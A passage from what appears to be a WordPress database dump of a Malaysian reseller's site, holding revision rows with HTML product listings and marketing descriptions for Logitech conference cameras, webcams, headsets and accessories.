https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 10:22:27','2019-03-04 02:22:27','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2937,1,'2019-03-04 10:23:33','2019-03-04 02:23:33','<h2>VIDEO CONFERENCINGâ€‹</h2>		\n										<img width=\"300\" height=\"262\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>CONFERENCE CAMERAS</h2><p>Bring video collaboration to huddle rooms and large conference rooms with Logitech ConferenceCams.</p>		\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-group-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h3>GROUP</h3><p>Video conferencing for mid to large-sized meeting rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-group/\" role=\"button\">\n						View\n					</a>\n										<img width=\"687\" height=\"600\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp.png 687w, https://bintara.com.my/wp-content/uploads/2018/12/rally-system-b2b-pdp-300x262.png 300w\" sizes=\"(max-width: 687px) 100vw, 687px\" />											\n		<h4>Rally</h4><p>Premium Ultra-HD ConferenceCam system with automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-rally/\" role=\"button\">\n						View\n					</a>\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h4>MeetUp</h4><p>All-in-One ConferenceCam with 120Â° field of view and integrated audio, perfect for small conference and huddle rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<a href=\"https://bintara.com.my/logitech-meetup/\" role=\"button\">\n						View\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-connect-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>CONNECT</h3><p>Portable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/conferencecam-bcc950-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BCC950</h3><p>Desktop video conferencing solution for private offices, home offices, and most any semi-private space</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/ptz-pro-2-camera-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>PTZ PRO 2</h3><p>HD 1080p video camera with enhanced pan/tilt and zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"500\" height=\"437\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/rally-camera-e1544499263206.png\" alt=\"\" />											\n		<h4>Rally Camera</h4><p>Premium PTZ camera with Ultra-HD imaging system and automatic camera control</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>VC ROOM SOLUTIONS</h2><p>Complete room solutions from Logitech allow participants to quickly kick off and run a video conference meeting.</p>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h3>SMARTDOCK</h3><p>Secure meeting room console designed for Skype Room Systems</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>WEBCAMS</h2><p>Designed to work with any VC software, Logitech webcams offer instant collaboration with high-quality HD video.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/briopictograms.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/briopictograms-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>BRIO</h3><p>4K Ultra HD webcam with RightLightâ„¢ 3 with HDR</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c930e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C930e</h3><p>Business webcam with a wide field of view and HD digital zoom</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/c925e-webcam-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech C925e</h3><p>Affordable 1080p HD webcam with integrated privacy shade</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/b525-pdp-2017-refresh-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech B525</h3><p>Ideal for on-the-go professionals with a compact, foldable, 360Â° swivel design</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n		<h2>HEADSETS</h2><p>Stylish and affordable, Logitech headsets are designed for long-lasting comfort to make every call more productive.</p>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/h570e-headset-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech H570e Headset</h3><p>Comfortable, affordable, and built to last</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n			<h2>VIDEO COLLABORATION ACCESSORIES</h2>		\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/smartdock-extender-box-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>SMARTDOCK EXTENDER BOX</h3><p>Connectivity options for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-screen-share-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech Screen Share</h3><p>A fast, familiar, and affordable way to share content in the conference room and into online meetings.</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-expansion-microphones-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP EXPANSION MICS</h3><p>Add-on mics for larger groups</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/logitech-smartdock-flex-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>Logitech SmartDock Flex</h3><p>Expansion Kit for Logitech SmartDock</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-15m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 15M EXTENDED CABLE</h3><p>15 meter cable for video conferences in larger rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/group-10m-extended-cable-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>GROUP 10M EXTENDED CABLE</h3><p>10 meter cable, ideal for large conference rooms</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>\n										<img width=\"393\" height=\"393\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics.png 393w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-expansion-mics-300x300.png 300w\" sizes=\"(max-width: 393px) 100vw, 393px\" />											\n		<h3>EXPANSION MIC FOR MEETUP</h3><p>Add-on microphone for huddle room flexibility</p>		\n			<a href=\"https://bintara.com.my/get-quotation-logitech/\" role=\"button\">\n						Get Quotation\n					</a>','Logitech','','inherit','closed','closed','','16-revision-v1','','','2019-03-04 10:23:33','2019-03-04 02:23:33','',16,'https://bintara.com.my/blog/2019/03/04/16-revision-v1/',0,'revision','',0),(2939,1,'2019-03-04 10:25:19','2019-03-04 02:25:19','<h2>MEETUP</h2><p>All-in-One ConferenceCam with an extra-wide field of view and integrated audio, perfect for small conference and huddle rooms</p><ul><li>See everyone, even those close to the camera</li><li>RightSenseâ„¢ Technologies with automatic framing</li><li>Compact design minimizes cabling and clutter</li></ul>		\n										<img width=\"300\" height=\"300\" src=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-300x300.png 300w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam-150x150.png 150w, https://bintara.com.my/wp-content/uploads/2018/12/meetup-conference-cam.png 393w\" sizes=\"(max-width: 300px) 100vw, 300px\" />											\n		<h2>PERFECT FOR SMALL ROOMS</h2><p>MeetUp is Logitechâ€™s premier ConferenceCam designed for small conference rooms and huddle rooms. Stop crowding around laptops. With an extra wide field of view, motorized lens and rightsightâ„¢ auto framing plus a pan/tilt lens, MeetUp makes every seat at the table clearly visible. With integrated audio optimized for huddle room acoustics, everyone can be heard as well as seen.</p>https://youtu.be/tD_tmRMN2OA<h3>A WIDE VIEW FOR TIGHT SPACES</h3><p>LogitechÂ® MeetUp brings remarkable video quality to small conference rooms. Its extra wide field-of-view easily accommodates huddle rooms where people sit on either side of the camera. The 4K ultra high-def sensor and Logitech lens deliver extra sharp clarity, while pan, tilt, and zoom controls let you focus on presenters and their visual aids.</p><h3>HEARING IS BELIEVING</h3><p>Housed within a patent-pending anti-vibration enclosure, three beamforming mics MeetUpâ€™s integrated audio is optimized for huddle room acoustics, delivering exceptional sound in small rooms. Three beamforming mics and a custom-tuned speaker ensure meetings sound as great as they look. Add Expansion Mic for MeetUp to extend the audio range up to 4.2 meters.</p>		\n										<img width=\"800\" height=\"450\" src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg\" alt=\"\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-768x432.jpg 768w\" sizes=\"(max-width: 800px) 100vw, 800px\" />											\n		https://youtu.be/CqeUIzYth_w<h3>AS EASY AS PLUG AND PLAY</h3><p>Step into a huddle room and instantly start a video collaboration. Whether it is Video conferencing, recording, or broadcasting applications that support USB cameras MeetUp simply works.</p><h3>DESIGNED FOR THE WAY PEOPLE MEET</h3><p>Small conference rooms are growing in popularity, and MeetUp rises to the challenge. It provides superb resolution, color balance, detail, and audio in tight spaces. With the included wall mount and compact design that minimizes cable clutter, MeetUp optimizes the huddle room experience.</p>https://youtu.be/4xwIpyv3KOs		\n				<figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-3-300x169.jpg\" alt=\"meetup-conference-cam (3)\" /></figure><figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-2-300x169.jpg\" alt=\"meetup-conference-cam (2)\" /></figure><figure><img src=\"https://bintara.com.my/wp-content/uploads/2019/03/meetup-conference-cam-1-300x169.jpg\" alt=\"meetup-conference-cam (1)\" /></figure>			\n		<h3>EXTRAS PROVIDE MORE CONVENIENCE</h3><p>Our free mobile app (available on Google Play and iTunes) turns your smartphone or tablet into a remote control for MeetUp. Add accessories such as the Logitech Expansion Mic and TV Mount for different room sizes and configurations. Order replacement parts if needed to keep everything up and running.</p><h4>5X ZOOM</h4><p>Perfectly frame presenters to minimize background distractions. Zoom in on whiteboards and objects so remote participants can see what you see. Thanks to its advanced 4K image sensor, video remains sharp and clear, even when you zoom in on the details.</p><h4>PREMIUM CAMERA OPTICS</h4><p>MeetUp features exquisitely engineered, premium camera optics that capture a wide field-of-view without distorting faces and furniture with a â€œfisheyeâ€ effect. Faces look natural, whiteboard writing remains legible, and straight lines stay straight.</p><h4>EXPANSION MIC-READY</h4><p>Logitech Expansion Mic for MeetUp provides greater flexibility in huddle room configurations. MeetUpâ€™s built-in beamforming mics are optimized for up to 8 feet (2.4 meters). To extend that range up to 14 feet (4.2 meters), add an Expansion Mic. So whether people are seated at a table, sitting against the wall, or walking around the room, Expansion Mic for MeetUp means everyone will be heard.</p><h4>CERTIFIED FOR BUSINESS</h4><p>MeetUp offers a plug-and-play USB connection to conference room computers, and is certified for Skype for Business and ready for Teams, Microsoft CortanaÂ®, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo,Fuze and Zoom. If your preferred application can recognize a webcam, you can use it with MeetUp.</p><h4>BLUETOOTHÂ® SPEAKERPHONE</h4><p>Already connected on your smartphone? Dialing into an audio conference? Pair MeetUp with your smartphone or tablet to enjoy outstanding audio clarity, volume, and range that handheld devices canâ€™t match.</p><h4>TAKE CONTROL</h4><p>MeetUp gives you two ways to aim the camera, zoom in and out, set and recall presets, and manage volume and mute. The included remote control uses radio frequency (RF) signals for reliable and discrete control from anywhere in the room. Or, download the free Logi Remote app (available on Google Play and iTunes to control MeetUp with a smartphone or tablet.</p><h4>VERSATILE TV MOUNT</h4><p>Logitech TV Mount for MeetUp lets you mount the MeetUp ConferenceCam either above or below a flat-panel monitor, and attaches to the industry-standard VESA mounting points available on most TVs and monitors.</p><h4>RIGHTSENSE</h4><p>Logitech RightSenseâ„¢ proactive technologies make better video meetings easy and automatic.HÂ® RightSound optimizes the human voice and enhances conversational clarity, RightSight automatically moves the camera and adjusts the zoom so no one gets left out of the picture, and RightLight helps everyone look their best on camera, regardless of lighting conditions. With RightSense on board, video meetings are naturally more beautiful and efficient with no calibration, manual intervention or support required.</p>','Logitech MEETUP','','inherit','closed','closed','','2928-revision-v1','','','2019-03-04 10:25:19','2019-03-04 02:25:19','',2928,'https://bintara.com.my/blog/2019/03/04/2928-revision-v1/',0,'revision','',0),(2940,1,'2019-03-04 10:27:27','2019-03-04 02:27:27','<h2>CONNECT</h2>\r\nPortable ConferenceCam with Bluetooth speakerphone for the huddle room, home office, and on the go\r\n<ul>\r\n 	<li>Superior video and audio with a compact, 76 mm footprint</li>\r\n 	<li>Works with your meeting and video conferencing applications</li>\r\n 	<li>Plug-free mobility with rechargeable battery</li>\r\n</ul>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png\" sizes=\"(max-width: 300px) 100vw, 300px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x262.png 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.png 687w\" alt=\"\" width=\"300\" height=\"262\" />\r\n<h2>FLEXIBLE VIDEO FOR THE ANYWHERE WORKPLACE</h2>\r\nSimplify video conferencing so anyone can set it up and run a meeting anywhere. Make it affordable so you can outfit every conference room with video. Designed for huddle rooms and home offices, Logitech Connect is also compact and mobile so you can take it throughout the workplace and around the world. Connect is always ready for your next video conference call.\r\n<h4>KEY FEATURES</h4>\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>PERFECT FOR SMALL SPACES</h3>\r\nLogitech Connect goes beyond its award winning design â€” video conferencing so simple to use that anyone can set it up and so affordable you can enable every meeting room with video. Designed for tabletop placement and small spaces, this video conference solution offers a generous 90Â° field-of-view with pan and tilt, 4x zoom, and razor-sharp optics making it easy to see everyone in the room.\r\n<h3>COMPACT ALL-IN-ONE DESIGN</h3>\r\nTake video conferencing on the go. Carry Connect from meeting to meeting, or pack it when traveling so you never miss the opportunity to meet face to face. With a tabletop footprint just 3 inches (75 mm) across, Connect fits just about anywhere. Even the handheld remote is designed for easy portability, docking as a lens cover so you wonâ€™t lose it in your bag.\r\n\r\nhttps://youtu.be/Z9jk_qlVlTY\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-1-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h3>COMPATIBLE WITH MOST VC APPS</h3>\r\nConnect offers a plug-and-play USB connection to Windows and Mac computers and Chromebooksâ„¢, and is certified for Skype for Business, Cisco Jabberâ„¢ compatible, and offers enhanced integration with BlueJeans, Broadsoft, LifeSize Cloud, Vidyo, and Zoom.\r\n<h3>PREMIUM CAMERA LENS</h3>\r\nConnect features a premium glass lens for maximum clarity. Enjoy bright, clear video with accurate color rendition and sharpness, even when zoomed in. Easily protect the lens from dust and scratches by docking the magnetic remote control.\r\n\r\n<img src=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg\" sizes=\"(max-width: 800px) 100vw, 800px\" srcset=\"https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2.jpg 930w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-300x169.jpg 300w, https://bintara.com.my/wp-content/uploads/2019/03/conferencecam-connect-2-768x432.jpg 768w\" alt=\"\" width=\"800\" height=\"450\" />\r\n<h4>ADDITIONAL FEATURES</h4>\r\n<h4>EASY AUDIO 